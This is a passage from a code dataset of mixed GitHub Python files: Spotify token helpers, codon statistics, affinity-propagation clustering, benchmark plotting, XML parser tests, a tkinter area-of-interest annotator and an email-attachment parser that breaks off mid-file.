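\n#\n# Worked example (added illustration): for arr = [4,3,2,1], partition(arr, 0, 3)\n# picks pivot 1; no element is <= 1 before it, so the pivot swaps to index 0,\n# giving [1,3,2,4], and the halves [] and [3,2,4] are then sorted recursively,\n# ending in [1,2,3,4].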
","repo_name":"Tanat04/data-structure-algorithm","sub_path":"ClassWork/practice/quicksort.py","file_name":"quicksort.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"31513007244","text":"import requests\n\nimport constants\n\n\ndef exchange_auth_token_for_refresh_token(auth_token):\n    response = requests.post(\n        \"https://accounts.spotify.com/api/token\",\n        data={\n            \"code\": auth_token,\n            \"redirect_uri\": constants.REDIRECT_URI,\n            \"grant_type\": \"authorization_code\",\n            \"client_id\": constants.CLIENT_ID,\n            \"client_secret\": constants.CLIENT_SECRET,\n        },\n    )\n    return response.json()[\"refresh_token\"]\n\n\ndef get_access_token(refresh_token):\n    response = requests.post(\n        \"https://accounts.spotify.com/api/token\",\n        data={\n            \"refresh_token\": refresh_token,\n            \"grant_type\": \"refresh_token\",\n            \"client_id\": constants.CLIENT_ID,\n            \"client_secret\": constants.CLIENT_SECRET,\n        },\n    )\n    if not response.ok:\n        raise RuntimeError(\"Could not obtain token: \", response.content)\n    return response.json()[\"access_token\"]","repo_name":"rjshearme/spotify_recently_added_playlist","sub_path":"tokens.py","file_name":"tokens.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"43969216286","text":"#!/usr/bin/env python\nimport argparse\nimport logging\nfrom Bio import SeqIO, Seq\n\nlogging.basicConfig(level=logging.INFO)\n\n\ndef codon_stats(fasta_file, **kwargs):\n    records = list(SeqIO.parse(fasta_file, \"fasta\"))\n\n    codons = {}\n\n    for b1 in (\"A\", \"C\", \"T\", \"G\"):\n        for b2 in (\"A\", \"C\", \"T\", \"G\"):\n            for b3 in (\"A\", \"C\", \"T\", \"G\"):\n                codons[b1 + b2 + b3] = str(Seq.Seq(b1 + b2 + b3).translate(table=1))\n\n    tn_table_keys = sorted(codons.keys())\n\n    header = [\"#ID\", \"Length\"] + [\"%s (%s)\" % (x, codons[x]) for x in tn_table_keys]\n    yield header\n\n    for record in records:\n        seq = str(record.seq)\n        codon_counts = {}\n\n        for tri_nt in [seq[i : i + 3] for i in range(0, len(seq), 3)]:\n            try:\n                codon_counts[tri_nt] += 1\n            except KeyError:\n                codon_counts[tri_nt] = 1\n\n        row = [record.id, len(record.seq)]\n        numbers = []\n        for tri_nt in tn_table_keys:\n            if tri_nt in codon_counts:\n                numbers.append(codon_counts[tri_nt])\n            else:\n                numbers.append(0)\n\n        numbers = [float(x) / sum(numbers) for x in numbers]\n        yield row + numbers\n\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser(\n        description=\"Calculate AA frequencies in sequences\"\n    )\n    parser.add_argument(\"fasta_file\", type=argparse.FileType(\"r\"), help=\"Fasta file\")\n    parser.add_argument(\"--version\", action=\"version\", version=\"0.1\")\n    args = parser.parse_args()\n\n    for row in codon_stats(**vars(args)):\n        print(\"\\t\".join(map(str, row)))\n","repo_name":"TAMU-CPT/galaxy-tools","sub_path":"tools/fasta/fasta_codonstats.py","file_name":"fasta_codonstats.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"6"} +{"seq_id":"33305106764","text":"################################################################################\n######################### 10X -- AFFINITY PROPAGATION #########################\n################################################################################\n\n\"\"\"
\nScripts for affinity propagation clustering based on the scikit-learn implementation.\n\"\"\"\n\n################################################################################\n################################ DEPENDENCIES ##################################\n################################################################################\n\nimport random, itertools\nfrom collections import Counter\nimport numpy as np\nimport pandas as pd\nfrom scipy.spatial.distance import pdist, squareform\nimport scipy.cluster.hierarchy as sch\nfrom sklearn.cluster import AffinityPropagation\nfrom fastcluster import linkage\nfrom polo import optimal_leaf_ordering\n\n################################################################################\n################################# MISC FUNCTIONS ###############################\n################################################################################\n\ndef return_unique(groups, drop_zero = False):\n    \"\"\"\n    Returns unique instances from a list (e.g. an AP cluster Series) in order\n    of appearance.\n    \"\"\"\n    unique = []\n\n    for element in groups.values:\n        if element not in unique:\n            unique.append(element)\n\n    if drop_zero == True:\n        unique.remove(0)\n\n    return unique\n\n################################################################################\n################################# CLUSTERING ###################################\n################################################################################\n\ndef AP_clustering_v4P(aff_mat, axis, preference, damping, **kwargs):\n\n    \"\"\"\n    Defines clusters along either axis of the expression matrix using the affinity propagation algorithm\n    (Frey and Dueck, Science 2007). The scikit-learn implementation is used for AP clustering.\n\n    -----\n\n    aff_mat[pd.DataFrame]: precomputed affinity matrix of samples or genes.\n\n    axis[int]: 0 (cells) or 1 (genes)\n\n    preference[float]: AP preference parameter. If preference == None, the median affinity is used as preference.\n\n    damping[float]: AP damping parameter.\n
Must be between 0.5 and 1.0.\n \n * and additional function arguments are specified in \n http://scikit-learn.org/stable/modules/generated/sklearn.cluster.AffinityPropagation.html#sklearn.cluster.AffinityPropagation\n -----\n returns: pd.Series containing axis indices (cell or gene names) with associated cluster number.\n \"\"\"\n \n ########################################\n \n def affinity_propagation(data, axis, preference, damping, **kwargs):\n \n \"\"\"\n Helper around sklearn AffinityPropagation function.\n \"\"\"\n\n af = AffinityPropagation(damping=damping, preference=preference, affinity='precomputed', **kwargs)\n\n if axis == 0:\n af.fit(data.T)\n elif axis == 1:\n af.fit(data)\n\n return af\n\n ########################################\n \n ### get and label AP output\n \n af = affinity_propagation(aff_mat, axis, preference, damping, **kwargs) \n \n labels = pd.Series(af.labels_, index = aff_mat.index)\n \n return labels.sort_values()\n\n################################################################################\n\ndef eucl_2d(data):\n\n \"\"\"\n Return pd.DataFrame of pairwaise euclidean distance of pd.DataFrame (colums)\n \"\"\"\n \n return pd.DataFrame(squareform(pdist(data, 'euclidean')), index = data.index, columns = data.index)\n\n################################################################################\n\ndef smooth_clustering(dist, cluster, k, p):\n\n \"\"\"\n Simple function to reassign cell identity of cluster-outliers based on nearest neighbors in 2d-embedding (UMAP) space.\n ----------\n dist: pd.DataFrame of pairwise m x m cell distances in 2d-space.\n cluster: pd.Series containing cluster identity for m cells.\n k: k nearest neighbors to be considered.\n p: threshold for outlier specification. A cell is considered an outlier if less than p of its k nearest neighbors in [dist] \n space are assigned to the same cluster.\n ----------\n returns reordered pd.Series object with reassigned cluster identity.\n \"\"\"\n \n #get k-nearest neighbors of all cells in 2d-embedding space\n \n kNN = {c:dist.loc[c].sort_values()[1:k+1].index for c in cluster.index}\n \n #find cells with less than p nearest neighbors of the same cluster and reassign them to cluster with most \n #nearest neighbors\n \n cnt = 0\n cluster_new = cluster.copy()\n \n for c in cluster.index:\n cl_c = cluster[c]\n cl_NN = Counter(cluster[kNN[c]])\n if cl_NN[cl_c] <= p:\n cluster_new[c] = cl_NN.most_common()[0][0]\n cnt += 1\n \n print('%s/%s cells reassigned!' % (cnt, len(cluster)))\n return AP_groups_reorder_v2(cluster_new, return_unique(cluster))\n\n################################################################################\n############################ PARAMETER SELECTION ###############################\n################################################################################\n\ndef AP_param_sel_v4P(data, aff_mat, axis, r_preference, r_damping, dview, criterion='BIC', **kwargs):\n \n \"\"\"\n Calculates the cluster numbers and information criterion values (AIC or BIC) for affinity propagation clustering \n in the specified range of preference and damping values.\n -----\n data[pd.DataFrame]: DataFrame of m samples x n genes.\n aff_mat[pd.DataFrame]: precomputed affinity matrix of samples or genes.\n axis[int]: 0 (cells) or 1 (genes)\n r_preference[list]: list specififying range of preference values to test.\n r_damping[list]: list specififying range of damping values to test.\n view: name of Ipython DirectView Instance for parallel computing.\n criterion[str]: 'AIC' or 'BIC'. 
Default = 'BIC'.\n -----\n returns pd.DataFrames containing IC values (IC) and number of groups (Ng) for preference / damping pairs.\n \"\"\"\n \n #initialize output\n \n output_IC = pd.DataFrame(columns = r_preference, index = r_damping)\n output_N = pd.DataFrame(columns = r_preference, index = r_damping)\n \n #define preference and damping parameters\n \n pref, damp = zip(*[x for x in itertools.product(r_preference, r_damping)])\n \n l_map = len(pref)\n \n #do AP clustering in parallel\n \n ap = dview.map_sync(AP_clustering_v4P, \n [aff_mat] * l_map, \n [axis] * l_map,\n pref, \n damp)\n \n #calculate IC value\n \n ic = dview.map_sync(calculateIC_v2P,\n [data] * l_map, \n ap,\n [axis] * l_map,\n [criterion] * l_map)\n \n #update output DataFrames\n \n for P, D, A, I in zip(pref, damp, ap, ic):\n \n output_IC.ix[D, P] = I\n output_N.ix[D, P] = len(set(A))\n \n print(output_N)\n print(output_IC)\n print(AP_IC_findmin_v1(output_IC))\n \n################################################################################\n\ndef calculateIC_v2P(data, groups, axis, criterion):\n \n \"\"\"\n Calculates the Aikike (AIC) or Bayesian information criterion (BIC) using a formula described in\n http://en.wikipedia.org/wiki/Bayesian_information_criterion\n -----\n data[pd.DataFrame]: DataFrame of m samples x n genes.\n groups[pd.Series]: Series containing group identity (int) for each sample or gene in dataframe.\n axis: 0 for samples, 1 for genes.\n criterion: 'AIC' or 'BIC'.\n \"\"\"\n \n #for parallel processing, import modules and helper functions to engine namespace\n\n \n # main formula: BIC = N * ln (Vc) + K * ln (N)\n # main formula: AIC = 2 * N * ln(Vc) + 2 * K\n # Vc = error variance\n # n = number of data points\n # k = number of free parameters\n try:\n if axis == 0:\n\n X = data\n\n elif axis == 1:\n\n X = data.T\n\n Y = groups\n\n N = len(X.columns)\n\n K = len(set(Y))\n\n #1. Compute pd.Series Kl containing cluster lengths\n\n Kl = pd.Series(index = set(Y))\n Kl_dict = Counter(Y)\n\n for cluster in set(Y):\n Kl[cluster] = Kl_dict[cluster]\n\n #2. Compute pd.DataFrame Vc containing variances by cluster\n\n Vc = pd.DataFrame(index = X.index, columns = set(Y))\n\n for cluster in set(Y):\n\n tmp_ix = Y[Y == cluster].index\n tmp_X_var = X[tmp_ix].var(axis = 1) + 0.05 #to avoid -inf values\n Vc[cluster] = tmp_X_var\n\n #3. Calculate the mean variance for each cluster\n\n Vc = Vc.mean(axis = 0)\n\n #4. Calculate the ln of the mean variance\n\n Vc = np.log(Vc)\n\n #5. Multiply Vc by group size Kl\n\n Vc = Vc * Kl\n\n #6. Calculate accumulative error variance\n\n Vc = Vc.sum()\n\n #7a. Calculate BIC\n\n BIC = Vc + K * np.log(N)\n\n #7b. Calculate AIC\n\n AIC = 2 * Vc + 2 * K\n\n #8. 
Return AIC or BIC value\n\n\n if criterion == 'BIC':\n\n return BIC\n\n if criterion == 'AIC':\n\n return AIC\n \n except: return None\n \n################################################################################\n \ndef AP_IC_findmin_v1(data):\n \n from operator import itemgetter\n \n to_dict = {}\n \n for r in data.index:\n for c in data.columns:\n to_dict[c,r] = data.loc[r,c]\n \n return sorted(to_dict.items(), key=itemgetter(1))[0][0]\n \n################################################################################\n############################# CLUSTER PROCESSING ################################\n################################################################################\n\ndef AP_invert_index(group_file, group):\n \n \"\"\"\n Inverts indices of a group in file of cluster groups.\n ----------\n group_file: pd.Series with ordered cluster identity of m cells or n genes.\n group: ID (int) of group to be inverted.\n ----------\n returns group file with inverted groups.\n \"\"\"\n \n ix_new = []\n \n for gr_tmp in return_unique(group_file):\n \n if gr_tmp == group:\n \n ix_tmp = list(group_file[group_file == gr_tmp].index)[::-1]\n \n else:\n \n ix_tmp = list(group_file[group_file == gr_tmp].index)\n \n ix_new += ix_tmp\n \n group_file_new = group_file[ix_new]\n \n return group_file_new\n\n################################################################################\n\ndef AP_order_incluster(dist, clusters, method = 'single', metric = 'correlation'):\n \n ordered = []\n \n #iterate over clusters\n \n for cl in return_unique(clusters):\n \n c_sel = clusters[clusters==cl].index\n D = pdist(dist.loc[c_sel, c_sel])\n Z = linkage(D, method = method)\n optimal_Z = optimal_leaf_ordering(Z, D)\n leaves = sch.dendrogram(optimal_Z, no_plot = True)['leaves']\n ordered += list(c_sel[leaves])\n \n return clusters[ordered]\n \n################################################################################\n \ndef AP_groups_reorder_v2(groups, order, link_to = None):\n \n \"\"\"\n Reorders the groups in an sample or gene group Series either completely or partially\n -----\n groups: pd.Series of either samples (Cell ID) or gene (gene ID) linked to groups (int)\n order: list containing either complete or partial new order of groups\n link_to: defines which group position is retained when groups are reorded partially; default == None, groups are linked to\n first group in 'order'\n -----\n returns reordered group Series\n \"\"\"\n \n # (1) Define new group order\n \n if set(order) == set(groups):\n order_new = order\n \n else:\n \n order_new = return_unique(groups, drop_zero = False)\n \n if link_to in order:\n link = link_to\n \n elif link_to not in order or link_to == None:\n link = order[0]\n \n order.remove(link)\n \n for group in order:\n \n order_new.remove(group)\n ins_ix = order_new.index(link) + 1\n gr_ix = order.index(group)\n order_new.insert(ins_ix + gr_ix, group)\n \n # (2) Reorder groups\n \n groups_new = pd.Series()\n \n for group in order_new:\n \n groups_new = groups_new.append(groups[groups == group])\n \n groups_new = groups_new\n \n return groups_new\n 
\n\n################################################################################\n################################################################################\n################################################################################\n################################################################################\n################################################################################\n################################################################################\n################################################################################","repo_name":"kasperlab/Joost_et_al_2020_Cell_Stem_Cell","sub_path":"Skin10X_affinity_propagation_v1_4.py","file_name":"Skin10X_affinity_propagation_v1_4.py","file_ext":"py","file_size_in_byte":13438,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"6"} +{"seq_id":"34993321125","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom pdb import set_trace as bp\nsns.set(style='whitegrid')\nsns.set_palette(sns.color_palette(\"muted\"))\nsns.despine()\n\ndef plot_stuff(name, df, log=False):\n plt.clf()\n xaxis = df.index\n fig, ax = plt.subplots()\n # ax.plot(xaxis, df['bst_insert'], 'o', alpha=0.8, label='bst_insert')\n ax.plot(xaxis, df['avl_insert'], 'o', alpha=0.8, label='avl_insert')\n ax.plot(xaxis, df['rb_insert'], 'o', alpha=0.8, label='rb_insert')\n if log:\n plt.yscale('log')\n name += ' (log)'\n fig.suptitle(name, fontsize=22)\n ax.legend(loc='best', fontsize='large', frameon=True)\n plt.savefig('img/'+name+'_insert.png', bbox_inches='tight', dpi=300)\n plt.clf()\n\n\n fig, ax = plt.subplots()\n fig.suptitle(name, fontsize=22)\n # ax.plot(xaxis, df['bst_search'], 'o', alpha=0.8, label='bst_search')\n ax.plot(xaxis, df['avl_search'], 'o', alpha=0.8, label='avl_search')\n ax.plot(xaxis, df['rb_search'], 'o', alpha=0.8, label='rb_search')\n if log: plt.yscale('log')\n ax.legend(loc='best', fontsize='large', frameon=True)\n plt.savefig('img/'+name+'_search.png', bbox_inches='tight', dpi=300)\n plt.clf()\n\n fig, ax = plt.subplots()\n fig.suptitle(name, fontsize=22)\n ax.plot(xaxis, df['bst_height'], 'o', alpha=0.8, label='bst_height')\n ax.plot(xaxis, df['avl_height'], 'o', alpha=0.8, label='avl_height')\n ax.plot(xaxis, df['rb_height'], 'o', alpha=0.8, label='rb_height')\n if log: plt.yscale('log')\n fig.suptitle(name, fontsize=22)\n ax.legend(loc='best', fontsize='large', frameon=True)\n plt.savefig('img/'+name+'_height.png', bbox_inches='tight', dpi=300)\n plt.clf()\n\ndef plot_height(df):\n fig, ax = plt.subplots()\n xaxis = df.index\n ax.plot(xaxis, df['avl_height'], '-', alpha=0.8, label='avl_height', lw=4)\n ax.plot(xaxis, df['rb_height'], '-', alpha=0.8, label='rb_height', lw=4)\n fig.suptitle('Worst case heights', fontsize=22)\n ax.legend(loc='best', fontsize='large', frameon=True)\n plt.savefig('img/worst_heights.png', bbox_inches='tight', dpi=300)\n plt.clf()\n\n\n# df = pd.DataFrame.from_csv(\"tree_performance.csv\",sep=',')\n# plot_stuff('Average case', df)\n\ndf = pd.DataFrame.from_csv(\"tree_performance_worst.csv\",sep=',')\nplot_stuff('Worst case', df)\n# plot_stuff('Worst case', df, True)\nplot_height(df)\n","repo_name":"lbrito1/cstuff","sub_path":"benchmark/report.py","file_name":"report.py","file_ext":"py","file_size_in_byte":2397,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"6"} +{"seq_id":"74005468669","text":"from txml import XmlParser\nfrom 
xml.etree.ElementTree import fromstring\nimport unittest\n\n\nclass TestXmlParser(unittest.TestCase):\n\n def setUp(self):\n self.parser = XmlParser(source='sample.xml')\n self.str_source = \"\\\n ACLS5test.CEE\\\n \\\n \\\n \\\n \\\n \\\n \\\n \\\n \\\n \\\n \\\n \\\n \\\n hoi]]>\\\n \\\n \"\n\n def tearDown(self):\n del self.parser\n\n def test_get_encoding(self):\n self.encoded_parser = XmlParser(source='jan96down.xml')\n control_encoding = 'iso-8859-1'\n test_encoding = self.encoded_parser.encoding\n self.assertEqual(test_encoding, control_encoding)\n\n control_encoding = 'UTF-8'\n test_encoding = self.parser.encoding\n self.assertEqual(test_encoding, control_encoding)\n\n def test_source_check(self):\n non_existant_xml = 'some_random_file.xml'\n test_parser = XmlParser(source=non_existant_xml)\n self.assertEqual(test_parser.proces_file, False)\n self.assertEqual(test_parser.use_io, False)\n\n existing_xml = 'sample.xml'\n test_parser = XmlParser(source=existing_xml)\n self.assertEqual(test_parser.proces_file, True)\n self.assertEqual(test_parser.use_io, False)\n\n bad_format_str = \"Just some random string of words\"\n test_parser = XmlParser(source=bad_format_str)\n self.assertEqual(test_parser.proces_file, False)\n self.assertEqual(test_parser.use_io, False)\n\n proper_format_str = self.str_source\n test_parser = XmlParser(source=proper_format_str)\n self.assertEqual(test_parser.proces_file, True)\n self.assertEqual(test_parser.use_io, True)\n\n def test_node_to_dict(self):\n\n test_node = fromstring(self.str_source)\n my_parser = XmlParser()\n if hasattr(test_node, 'getroot'):\n test_node = test_node.getroot()\n test_dict = my_parser._node_to_dict(test_node)\n control_dict = {'path': 'export/level4/NL/30114.xml',\n 'Product_ID': '30114', 'Updated': '20150301102709',\n 'Quality': 'AWESOME', 'Supplier_id': '5',\n 'Prod_ID': 'FLY-734CU', 'Catid': '587',\n 'On_Market': '1',\n 'Model_Name': 'Mibatsu Monstrosity',\n 'Product_View': '32767',\n 'HighPic': 'http://images.awesome.biz/img/high/30114-Mibatsu.jpg',\n 'HighPicSize': '20782', 'HighPicWidth': '320',\n 'HighPicHeight': '300', 'Date_Added': '20050715000000',\n 'text': ' ',\n 'tag': \"file\"}\n self.assertDictEqual(test_dict, control_dict)\n\n def test_get_namespaces(self):\n encoded_parser = XmlParser(source='jan96down.xml')\n # encoded_parser._get_namespaces()\n test_dict = encoded_parser.namespaces\n t_key = list(test_dict.keys())[0]\n ts_list = test_dict[t_key]\n ts_list.sort()\n test_dict = {t_key: ts_list}\n control_list = ['Application', 'ParaCurve', 'Metric', 'Start',\n 'Cant', 'Feature', 'Curve', 'CoordGeom',\n 'Alignments', 'Property', 'LandXML', 'CantStation',\n 'Profile', 'End', 'Center', 'Project', 'PVI', 'Units',\n 'Spiral', 'ProfAlign', 'Alignment', 'PI', 'Line']\n control_list.sort()\n control_dict = {'{http://www.landxml.org/schema/LandXML-1.1}': control_list}\n self.assertDictEqual(test_dict, control_dict)\n\n def test_search_nodes(self):\n products = self.parser.search_nodes(tag='controller')\n products_list = list(products)\n\n test_num_matches = len(products_list)\n control_num_matches = 3\n self.assertEqual(test_num_matches, control_num_matches)\n\n test_product = products_list[0]['elem']\n control_product = {'type': 'usb', 'index': '0',\n 'text': '\\n ',\n 'tag': 'controller'}\n\n self.assertDictEqual(test_product, control_product)\n\n test_list = products_list[0]['children']\n control_list = [{'children': [],\n 'elem': {'name': 'usb0',\n 'text': None, 'tag': 'alias'}},\n {'children': [],\n 'elem': {'type': 
'pci', 'domain': '0x0000',\n                                              'bus': '0x00', 'slot': '0x01',\n                                              'function': '0x2',\n                                              'text': None, 'tag': 'address'}}]\n\n        self.assertEqual(test_list, control_list)\n\n    def test_search_node_attr(self):\n        product = self.parser.search_node_attr(\n            tag='controller', type='usb')\n        prod_list = list(product)\n\n        test_matches = len(prod_list)\n        control_matches = 1\n        self.assertEqual(test_matches, control_matches)\n\n        test_product_elem = prod_list[0]['elem']\n        control_product_elem = {'type': 'usb', 'index': '0',\n                                'text': '\\n ',\n                                'tag': 'controller'}\n        self.assertEqual(test_product_elem, control_product_elem)\n\n        test_product_children = prod_list[0]['children']\n        control_product_children = [{'children': [],\n                                     'elem': {'name': 'usb0',\n                                              'text': None,\n                                              'tag': 'alias'}},\n                                    {'children': [],\n                                     'elem': {'type': 'pci',\n                                              'domain': '0x0000',\n                                              'bus': '0x00',\n                                              'slot': '0x01',\n                                              'function': '0x2',\n                                              'text': None,\n                                              'tag': 'address'}}]\n        self.assertEqual(test_product_children, control_product_children)\n\n    def test_get_all_tags(self):\n\n        test_list = self.parser.get_all_tags()\n        control_list = ['sound', 'memballoon', 'pae', 'currentMemory', 'disk',\n                        'mac', 'boot', 'emulator', 'driver', 'graphics',\n                        'imagelabel', 'virtualport', 'video', 'on_crash',\n                        'resource', 'serial', 'name', 'cpu', 'feature',\n                        'alias', 'os', 'address', 'memory', 'channel',\n                        'controller', 'console', 'parameters', 'uuid',\n                        'devices', 'listen', 'domain', 'interface',\n                        'type', 'input', 'label', 'on_poweroff',\n                        'features', 'acpi', 'seclabel', 'vcpu', 'clock',\n                        'on_reboot', 'apic', 'source', 'protocol',\n                        'target', 'model', 'partition']\n        control_list.sort()\n        test_list.sort()\n\n        self.assertListEqual(test_list, control_list)\n\n\nif __name__ == '__main__':\n    unittest.main()\n","repo_name":"jdelgit/txml","sub_path":"test_txml.py","file_name":"test_txml.py","file_ext":"py","file_size_in_byte":8007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"22633223046","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n#django\n\n#python\nimport tkinter as tk\nfrom tkinter import Label,Tk\nfrom PIL import Image, ImageTk\nimport PIL.Image\nimport json\n#gazepattern\nfrom eyedetector.models import Image, ImageRectangle\n\n\nclass Application(object):\n\n    def __init__(self, image_path, image):\n        root = tk.Tk()\n        root.geometry( \"1000x720\" )\n        self.aois = []\n        self.parent = root\n        self.path = image_path\n        self.image = image\n        self.move = False\n        self._create_canvas()\n        self._create_canvas_binding()\n        root.mainloop()\n\n    def _create_canvas(self):\n        self.canvas = tk.Canvas(self.parent, width = 1366, height = 768,\n                                bg = \"white\" )\n        self.canvas.grid(row=0, column=0, sticky='nsew')\n        #path=filedialog.askopenfilename(filetypes=[(\"Image File\",'.jpg')])\n        self.im = PIL.Image.open(self.path)\n        self.wazil,self.lard=self.im.size\n        self.canvas.config(scrollregion=(0,0,self.wazil,self.lard))\n        self.tk_im = ImageTk.PhotoImage(self.im)\n        self.canvas.create_image(0,0,anchor=\"nw\",image=self.tk_im)\n\n    def _create_canvas_binding(self):\n        self.canvas.bind( \"<ButtonPress-1>\", self.start_rect )\n        self.canvas.bind( \"<ButtonRelease-1>\", self.stop_rect )\n        self.canvas.bind( \"<B1-Motion>\", self.moving_rect )\n\n    def start_rect(self, event):\n        self.move = True\n        #Translate mouse screen x0,y0 coordinates to canvas coordinates\n        self.rectx0 = self.canvas.canvasx(event.x)\n        self.recty0 = self.canvas.canvasy(event.y)\n        #Create rectangle\n        self.rect = self.canvas.create_rectangle(\n            self.rectx0, self.recty0, self.rectx0,
\n            self.recty0)\n        #Get rectangle's canvas object ID\n        self.rectid = self.canvas.find_closest(self.rectx0, self.recty0, halo=2)\n        print('Rectangle {0} started at {1} {2} {3} {4} '.\n              format(self.rect, self.rectx0, self.recty0, self.rectx0,\n                     self.recty0))\n\n    def moving_rect(self, event):\n        if self.move:\n            #Translate mouse screen x1,y1 coordinates to canvas coordinates\n            self.rectx1 = self.canvas.canvasx(event.x)\n            self.recty1 = self.canvas.canvasy(event.y)\n            #Modify rectangle x1, y1 coordinates\n            self.canvas.coords(self.rectid, self.rectx0, self.recty0,\n                          self.rectx1, self.recty1)\n            print('Rectangle x1, y1 = ', self.rectx1, self.recty1)\n\n    def stop_rect(self, event):\n        \"\"\"\n        Once the area selection is finished, a tkinter window is shown where\n        the name of the area of interest must be entered.\n        \"\"\"\n\n\n        self.move = False\n        #Translate mouse screen x1,y1 coordinates to canvas coordinates\n        self.rectx1 = self.canvas.canvasx(event.x)\n        self.recty1 = self.canvas.canvasy(event.y)\n        #Modify rectangle x1, y1 coordinates (final)\n        self.canvas.coords(self.rectid, self.rectx0, self.recty0,\n                      self.rectx1, self.recty1)\n        window = tk.Tk()\n\n        window.title(\"Area of Interest\")\n        labelone = tk.Label(window, text=\"Name of Area of Interest\")\n        labelone.grid(row = 0, column = 0)\n        name = tk.StringVar()\n\n        userEntry = tk.Entry(window, textvariable = name)\n        userEntry.grid(row = 0, column = 1)\n\n        def addAOI():\n            \"\"\"\n            Adds the element with its name and coordinates to the JSON.\n            \"\"\"\n\n            string_answer = userEntry.get()\n            item = {\n                'x0': self.rectx0, 'y0': self.recty0,\n                'x1': self.rectx1, 'y1': self.recty1,\n                'aoi': string_answer\n            }\n\n            self.aois.append(item)\n            print(self.aois)\n            close_window()\n\n        def close_window():\n            window.destroy()\n\n        def finish_program():\n            self.parent.destroy()\n\n        def save_json():\n            with open('data.json', 'w') as outfile:\n\n                self.image.rectangles.all().delete()\n                for aoi in self.aois:\n                    rectangle = ImageRectangle()\n                    rectangle.x0 = aoi.get('x0')\n                    rectangle.x1 = aoi.get('x1')\n                    rectangle.y0 = aoi.get('y0')\n                    rectangle.y1 = aoi.get('y1')\n                    rectangle.name = aoi.get('aoi')\n                    rectangle.image = self.image\n                    rectangle.save()\n                    print(rectangle)\n\n            close_window()\n            finish_program()\n\n        btn = tk.Button(window, text =\"Add\", command = addAOI)\n        btn.grid(row = 0, column = 3)\n        btn = tk.Button(window, text =\"Finish AOI definition\", command = save_json)\n        btn.grid(row = 1, column = 1)\n\n\nclass ShowImage(object):\n\n    def __init__(self, image_path, patern):\n        root = tk.Tk()\n        root.geometry( \"1000x720\" )\n        root.attributes(\"-fullscreen\", True)\n        self.parent = root\n        self.path = image_path\n\n        self.canvas = tk.Canvas(self.parent, width = 1366, height = 768,\n                                bg = \"white\" )\n        self.canvas.grid(row=0, column=0, sticky='nsew')\n        #path=filedialog.askopenfilename(filetypes=[(\"Image File\",'.jpg')])\n        self.im = PIL.Image.open(self.path)\n        self.wazil,self.lard=self.im.size\n        self.canvas.config(scrollregion=(0,0,self.wazil,self.lard))\n        self.tk_im = ImageTk.PhotoImage(self.im)\n        self.canvas.create_image(0,0,anchor=\"nw\",image=self.tk_im)\n\n        # make the top right close button minimize (iconify) the main window\n        root.protocol(\"WM_DELETE_WINDOW\", root.iconify)\n\n        # make Esc exit the program\n        root.bind('<Escape>', lambda e: root.destroy())\n\n        # create a menu bar with an Exit command\n        menubar = tk.Menu(root)\n        filemenu = tk.Menu(menubar, tearoff=0)\n        filemenu.add_command(label=\"Terminar Experimento\", command=root.destroy)\n        menubar.add_cascade(label=\"Experimento\",
menu=filemenu)\n root.config(menu=menubar)\n\n root.mainloop()\n patern.app_has_destroy = True","repo_name":"AriRodriguezCruz/mcfgpr","sub_path":"gazepattern/gui/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":6230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"10232086259","text":"import os\nimport csv\nimport base64\nimport html2text\nimport docx2txt\nfrom docx import Document\nfrom parsers import Parsers\nfrom .Worker import Worker\n\n\nclass Processor:\n\n def __init__(self, worker: Worker):\n self.tmp_fldr = os.getcwd() + '/temp/'\n self.worker = worker\n self.log = self.worker.logger\n self.docx_ext = '.docx'\n\n @staticmethod\n def attach_extention_check(attach_name):\n ext = attach_name.split('.')[-1]\n return (\n (ext == 'docx' or ext == 'doc' or ext == 'pdf' or ext == 'xls' or ext == 'xlsx')\n and\n ('рекв' in attach_name.lower() or 'карт' in attach_name.lower())\n )\n\n @staticmethod\n def attach_name_check(attach_name):\n return ('тз' not in attach_name.lower().split(' ') and 'заяв' not in attach_name.lower())\n\n def parse_docx(self, attachment_path):\n \"\"\"Parser via python-docx\"\"\"\n full_text = ''\n document = Document(''.join(attachment_path.split('.')[:-1]) + self.docx_ext)\n if len(document.tables) > 0:\n for table_count, _ in enumerate(document.tables):\n table = document.tables[table_count]\n for i, row in enumerate(table.rows):\n text = [cell.text + '\\n' for cell in row.cells if len(cell.text) > 2]\n full_text += '\\n '.join(text)\n\n paragraphs = []\n for num, para in enumerate(document.paragraphs):\n paragraphs.append(para.text)\n full_text += ' '.join(paragraphs)\n\n if len(full_text) == 0:\n extracted_list = []\n for x in docx2txt.process(''.join(attachment_path.split('.')[:-1]) + self.docx_ext).split():\n if x not in extracted_list:\n extracted_list.append(x)\n return ' '.join(extracted_list)\n\n return full_text\n\n @staticmethod\n def parse_csv(attachment_path):\n full_text = ''\n with open(''.join(attachment_path.split('.')[:-1]) + '.csv', newline='') as csvfile:\n spamreader = csv.reader(csvfile, delimiter=',')\n for row in spamreader:\n full_text += \" \" + ' '.join(row)\n return full_text\n\n def save_attachments_files(self, parsed_eml):\n os.makedirs(self.tmp_fldr, exist_ok=True)\n attach_names = []\n if len(parsed_eml['attachment']) > 0:\n for attach_count in range(len(parsed_eml['attachment'])):\n attach_name = parsed_eml['attachment'][attach_count]['filename']\n attach_name = attach_name.replace('.', '')[:40] + \".\" + attach_name.split(\".\")[-1]\n print(attach_name)\n if self.attach_extention_check(attach_name) and self.attach_name_check(attach_name):\n f = open(f'{self.tmp_fldr}/{attach_name}', 'wb+')\n f.write(base64.b64decode(parsed_eml['attachment'][attach_count]['raw']))\n f.close()\n attach_names.append(attach_name)\n self.log.info(f'{attach_names}')\n return attach_names\n\n def 